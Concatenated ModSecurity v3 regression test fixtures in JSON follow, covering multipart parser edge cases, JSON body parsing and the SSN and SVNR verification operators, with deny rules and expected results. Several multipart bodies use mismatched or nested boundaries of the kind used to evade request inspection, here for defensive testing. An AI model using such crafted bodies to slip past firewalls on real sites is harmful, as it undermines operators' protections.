"brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: attachment\r", "Content-Type: multipart/mixed; boundary=BbC04y\r", "\r", "--BbC04y\r", "Content-Disposition: file; filename=\"file1.txt\"\r", "Content-Type: text/plain\r", "\r", "... contents of file1.txt ...\r", "--BbC04y\r", "Content-Disposition: file; filename=\"file2.gif\r", "Content-Type: image/jpeg\r", "Content-Transfer-Encoding: binary\r", "\r", "...contents of file2.gif...\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Invalid Content-Disposition header" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (multipart mixed - missing disposition)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=0000", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Type: multipart/mixed; boundary=BbC04y\r", "\r", "--BbC04y\r", "Content-Disposition: file; filename=\"file1.txt\"\r", "Content-Type: text/plain\r", "\r", "... contents of file1.txt ...\r", "--BbC04y\r", "Content-Disposition: file; filename=\"file2.gif\r", "Content-Type: image/jpeg\r", "Content-Transfer-Encoding: binary\r", "\r", "...contents of file2.gif...\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Part missing Content-Disposition header" }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500095\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500096\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"chain,phase:2,deny,id:500097\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (normal)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=0000", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "--0000\r", "Content-Disposition: form-data; name=\"name\"\r", "\r", "Brian Rectanus\r", "--0000\r", "Content-Disposition: form-data; name=\"email\"\r", "\r", "brian.rectanus@breach.com\r", "--0000\r", "Content-Disposition: form-data; name=\"image1\"; filename=\"image1.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA1\r", "--0000\r", "Content-Disposition: form-data; name=\"image2\"; filename=\"image2.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA2\r", "--0000\r", "Content-Disposition: form-data; name=\"image3\"; filename=\"image3.jpg\"\r", "Content-Type: image/jpeg\r", "\r", "BINARYDATA3\r", "--0000\r", "Content-Disposition: form-data; name=\"test\"\r", "\r", "This is test data.\r", "--0000--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "http_code": 403, "debug_log": "Upload file limit exceeded" }, "rules":[ "SecRuleEngine On", "SecUploadKeepFiles On", "SecUploadDir /tmp", "SecUploadFileLimit 2", "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,id:500161\"", "SecRule MULTIPART_FILE_LIMIT_EXCEEDED \"!@eq 1\" \"phase:2,deny,id:500162\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500163\"", "SecRule &FILES \"!@eq 3\" \"phase:2,deny,id:500164\"", "SecRule &FILES_NAMES \"!@eq 3\" \"phase:2,deny,id:500165\"", "SecRule &FILES_SIZES \"!@eq 3\" \"phase:2,deny,id:500166\"", "SecRule FILES_SIZES:/^image/ \"@eq 0\" \"phase:2,deny,id:500167\"", "SecRule &FILES_TMPNAMES \"!@eq 2\" \"phase:2,deny,id:500168\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (contains foreign bound., no UNMATCH rule)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=-----------------------------8842564605616207552020332273", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_token\"\r", "\r", "9e433de44c9e9b4ce19603269aa34edb\r", "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", "Content-Type: text/plain\r", "\r", "----ea520cef1a2937d8e928e357992c8fdd\r", "Content-Transfer-Encoding: 7bit\r", "Content-Type: text/plain; charset=US-ASCII;\r", " format=flowed\r", "\r", "Test message, the txt file had been attached.\r", "\r", "--\r", "Ervin\r", "\r", "\r", "-------------------------------8842564605616207552020332273--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "", "http_code": 200 }, "rules":[ "SecRuleEngine On" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (contains foreign bound., strict mode)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=-----------------------------8842564605616207552020332273", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_token\"\r", "\r", "9e433de44c9e9b4ce19603269aa34edb\r", "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", "Content-Type: text/plain\r", "\r", "----ea520cef1a2937d8e928e357992c8fdd\r", "Content-Transfer-Encoding: 7bit\r", "Content-Type: text/plain; charset=US-ASCII;\r", " format=flowed\r", "\r", "Test message, the txt file had been attached.\r", "\r", "--\r", "Ervin\r", "\r", "\r", "-------------------------------8842564605616207552020332273--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "", "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 0\" \"phase:2,deny,id:500095\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (contains foreign bound., wrong lead bound., strict mode)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=-----------------------------8842564605616207552020332273", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-------------------------------8842564605616207552020332274\r", "Content-Disposition: form-data; name=\"_token\"\r", "\r", "9e433de44c9e9b4ce19603269aa34edb\r", "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", "Content-Type: text/plain\r", "\r", "----ea520cef1a2937d8e928e357992c8fdd\r", "Content-Transfer-Encoding: 7bit\r", "Content-Type: text/plain; charset=US-ASCII;\r", " format=flowed\r", "\r", "Test message, the txt file had been attached.\r", "\r", "--\r", "Ervin\r", "\r", "\r", "-------------------------------8842564605616207552020332273--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "", "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 0\" \"phase:2,deny,id:500095\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (contains foreign bound., wrong sep. bound., strict mode)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=-----------------------------8842564605616207552020332273", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_token\"\r", "\r", "9e433de44c9e9b4ce19603269aa34edb\r", "-------------------------------8842564605616207552020332274\r", "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", "Content-Type: text/plain\r", "\r", "----ea520cef1a2937d8e928e357992c8fdd\r", "Content-Transfer-Encoding: 7bit\r", "Content-Type: text/plain; charset=US-ASCII;\r", " format=flowed\r", "\r", "Test message, the txt file had been attached.\r", "\r", "--\r", "Ervin\r", "\r", "\r", "-------------------------------8842564605616207552020332273--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "", "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 0\" \"phase:2,deny,id:500095\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (contains foreign bound., wrong final bound.)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=-----------------------------8842564605616207552020332273", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_token\"\r", "\r", "9e433de44c9e9b4ce19603269aa34edb\r", "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", "Content-Type: text/plain\r", "\r", "----ea520cef1a2937d8e928e357992c8fdd\r", "Content-Transfer-Encoding: 7bit\r", "Content-Type: text/plain; charset=US-ASCII;\r", " format=flowed\r", "\r", "Test message, the txt file had been attached.\r", "\r", "--\r", "Ervin\r", "\r", "\r", "-------------------------------8842564605616207552020332274--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "", "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 0\" \"phase:2,deny,id:500095\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (contains foreign bound., one part, wrong lead)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=-----------------------------8842564605616207552020332273", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-------------------------------8842564605616207552020332274\r", "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", "Content-Type: text/plain\r", "\r", "----ea520cef1a2937d8e928e357992c8fdd\r", "Content-Transfer-Encoding: 7bit\r", "Content-Type: text/plain; charset=US-ASCII;\r", " format=flowed\r", "\r", "Test message, the txt file had been attached.\r", "\r", "--\r", "Ervin\r", "\r", "\r", "-------------------------------8842564605616207552020332273--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "", "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 0\" \"phase:2,deny,id:500095\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (contains foreign bound., one part, wrong final)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=-----------------------------8842564605616207552020332273", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", "Content-Type: text/plain\r", "\r", "----ea520cef1a2937d8e928e357992c8fdd\r", "Content-Transfer-Encoding: 7bit\r", "Content-Type: text/plain; charset=US-ASCII;\r", " format=flowed\r", "\r", "Test message, the txt file had been attached.\r", "\r", "--\r", "Ervin\r", "\r", "\r", "-------------------------------8842564605616207552020332274--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "", "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 0\" \"phase:2,deny,id:500095\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (contains foreign bound., all valid, strict mode)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------3163850615828140691827348175", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------3163850615828140691827348175\r", "Content-Disposition: form-data; name=\"_token\"\r", "\r", "3eeb646795ba8db63b05ba77df2a0b2c\r", "-----------------------------3163850615828140691827348175\r", "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"multipart_text.txt\"\r", "Content-Type: text/plain\r", "\r", "Content-Type: multipart/alternative; boundary=\"00000000000041382f056d9314e6\"\r", "\r", "--00000000000041382f056d9314e6\r", "Content-Type: text/plain; charset=\"UTF-8\"\r", "Content-Transfer-Encoding: quoted-printable\r", "\r", "Hi,\r", "\r", "...\r", "\r", "--00000000000041382f056d9314e6\r", "Content-Type: text/html; charset=\"UTF-8\"\r", "Content-Transfer-Encoding: quoted-printable\r", "\r", "
\r", "...\r", "
\r", "\r", "--00000000000041382f056d9314e6--\r", "\r", "\r", "-----------------------------3163850615828140691827348175--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "", "http_code": 403 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"!@eq 0\" \"phase:2,deny,id:500095\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (contains foreign bound., permissive mode)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=-----------------------------8842564605616207552020332273", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_token\"\r", "\r", "9e433de44c9e9b4ce19603269aa34edb\r", "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", "Content-Type: text/plain\r", "\r", "----ea520cef1a2937d8e928e357992c8fdd\r", "Content-Transfer-Encoding: 7bit\r", "Content-Type: text/plain; charset=US-ASCII;\r", " format=flowed\r", "\r", "Test message, the txt file had been attached.\r", "\r", "--\r", "Ervin\r", "\r", "\r", "-------------------------------8842564605616207552020332273--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "", "http_code": 200 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500095\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (contains foreign bound., wrong lead bound., permissive mode)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=-----------------------------8842564605616207552020332273", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-------------------------------8842564605616207552020332274\r", "Content-Disposition: form-data; name=\"_token\"\r", "\r", "9e433de44c9e9b4ce19603269aa34edb\r", "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", "Content-Type: text/plain\r", "\r", "----ea520cef1a2937d8e928e357992c8fdd\r", "Content-Transfer-Encoding: 7bit\r", "Content-Type: text/plain; charset=US-ASCII;\r", " format=flowed\r", "\r", "Test message, the txt file had been attached.\r", "\r", "--\r", "Ervin\r", "\r", "\r", "-------------------------------8842564605616207552020332273--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "", "http_code": 200 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500095\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (contains foreign bound., wrong sep. bound., permissive mode)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=-----------------------------8842564605616207552020332273", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-------------------------------8842564605616207552020332273\r", "Content-Disposition: form-data; name=\"_token\"\r", "\r", "9e433de44c9e9b4ce19603269aa34edb\r", "-------------------------------8842564605616207552020332274\r", "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"msg.txt\"\r", "Content-Type: text/plain\r", "\r", "----ea520cef1a2937d8e928e357992c8fdd\r", "Content-Transfer-Encoding: 7bit\r", "Content-Type: text/plain; charset=US-ASCII;\r", " format=flowed\r", "\r", "Test message, the txt file had been attached.\r", "\r", "--\r", "Ervin\r", "\r", "\r", "-------------------------------8842564605616207552020332273--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "", "http_code": 200 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500095\"" ] }, { "enabled":1, "version_min":300000, "title":"multipart parser (contains foreign bound., all valid, permissive mode)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------3163850615828140691827348175", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------3163850615828140691827348175\r", "Content-Disposition: form-data; name=\"_token\"\r", "\r", "3eeb646795ba8db63b05ba77df2a0b2c\r", "-----------------------------3163850615828140691827348175\r", "Content-Disposition: form-data; name=\"_attachments[]\"; filename=\"multipart_text.txt\"\r", "Content-Type: text/plain\r", "\r", "Content-Type: multipart/alternative; boundary=\"00000000000041382f056d9314e6\"\r", "\r", "--00000000000041382f056d9314e6\r", "Content-Type: text/plain; charset=\"UTF-8\"\r", "Content-Transfer-Encoding: quoted-printable\r", "\r", "Hi,\r", "\r", "...\r", "\r", "--00000000000041382f056d9314e6\r", "Content-Type: text/html; charset=\"UTF-8\"\r", "Content-Transfer-Encoding: quoted-printable\r", "\r", "
\r", "...\r", "
\r", "\r", "--00000000000041382f056d9314e6--\r", "\r", "\r", "-----------------------------3163850615828140691827348175--\r" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log": "", "http_code": 200 }, "rules":[ "SecRuleEngine On", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500095\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/request-body-parser-multipart-crlf.json0000644000175000017500000000365413607066010031501 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"multipart parser (final CRLF)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length":"330", "Content-Type":"multipart/form-data; boundary=---------------------------69343412719991675451336310646", "Expect":"100-continue" }, "uri":"/", "method":"POST", "body":[ "-----------------------------69343412719991675451336310646", "Content-Disposition: form-data; name=\"a\"\r", "\r", "1\r", "1.1\r", "1.2\r", "1.3\r", "-----------------------------69343412719991675451336310646", "Content-Disposition: form-data; name=\"b\"\r", "\r", "2\r", "2.1\r", "2.2\r", "2.3\r", "-----------------------------69343412719991675451336310646--" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Adding request argument \\(BODY\\): name \"b\", value \"22.12.22.3\"", "http_code":403 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule MULTIPART_STRICT_ERROR \"@eq 1\" \"phase:2,deny,id:500055\"", "SecRule MULTIPART_UNMATCHED_BOUNDARY \"@eq 1\" \"phase:2,deny,id:500056\"", "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,id:500057\"", "SecRule ARGS_POST \"@eq 1231\" \"phase:2,deny,id:500067\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/request-body-parser-json.json0000644000175000017500000001014013607066010027471 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing JSON request body parser 1/2", "expected":{ "debug_log": "Target value: \"bar\" \\(Variable: ARGS:json.foo\\)" }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "application/json" }, "uri":"/?key=value&key=other_value", "method":"POST", "body": [ "{", " \"foo\":\"bar\",", " \"mod\":\"sec\"", "}" ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", "SecRule ARGS:json.foo \"bar\" \"id:'200441',phase:3,log\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing JSON request body parser 2/2", "expected":{ "debug_log": "Target value: \"bar\" \\(Variable: ARGS:json.first_level.first_key\\)" }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "application/json" }, "uri":"/?key=value&key=other_value", "method":"POST", "body": [ "{", "\"first_level\":", "{", " \"first_key\":\"bar\",", " \"second_key\":\"sec\"", "}", "}" ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", "SecRule ARGS \"bar\" \"id:'200441',phase:3,log\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing JSON request body parser - issue #1822 (1/2)", "expected":{ "debug_log": "Target value: \"0\" .Variable: REQBODY_ERROR." }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "application/json" }, "uri":"/?key=value&key=other_value", "method":"POST", "body": [ ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", "SecRule REQBODY_ERROR \"0\" \"id:'200441',phase:3,log\"" ] }, { "enabled":1, "version_min":300000, "title":"Testing JSON request body parser - issue #1822 (2/2)", "expected":{ "debug_log": "Target value: \"1\" .Variable: REQBODY_ERROR." }, "client":{ "ip":"200.249.12.31", "port":123 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "application/json" }, "uri":"/?key=value&key=other_value", "method":"POST", "body": [ "a" ] }, "server":{ "ip":"200.249.12.31", "port":80 }, "rules":[ "SecRuleEngine On", "SecRequestBodyAccess On", "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", "SecRule REQBODY_ERROR \"0\" \"id:'200441',phase:3,log\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/operator-verifysvnr.json0000644000175000017500000000201113607066010026651 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Operator :: @verifysvnr (1/1)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "32", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=1237%20010180¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Added VerifySVNR match TX.0: 1237 010180" }, "rules":[ "SecRuleEngine On", "SecRule ARGS \"@verifysvnr \\d{4} ?\\d{6}\" \"id:1,phase:2,capture,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/operator-verifyssn.json0000644000175000017500000000201413607066010026467 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing Operator :: @verifycpf (1/2)", "client":{ "ip":"200.249.12.31", "port":123 }, "server":{ "ip":"200.249.12.31", "port":80 }, "request":{ "headers":{ "Host":"localhost", "User-Agent":"curl/7.38.0", "Accept":"*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, "uri":"/", "method":"POST", "body": [ "param1=224-88-2046¶m2=value2" ] }, "response":{ "headers":{ "Date":"Mon, 13 Jul 2015 20:02:41 GMT", "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", "Content-Type":"text/html" }, "body":[ "no need." ] }, "expected":{ "debug_log":"Added VerifySSN match TX.0: 224-88-2046" }, "rules":[ "SecRuleEngine On", "SecRule ARGS \"@verifyssn \\d{3}-?\\d{2}-?\\d{4}\" \"id:1,phase:2,capture,pass,t:trim\"" ] } ] modsecurity-v3.0.4/test/test-cases/regression/operator-verifycpf.json0000644000175000017500000000203713607066010026441 0ustar zimmerlezimmerle[ { "enabled":1, "version_min":300000, "title":"Testing 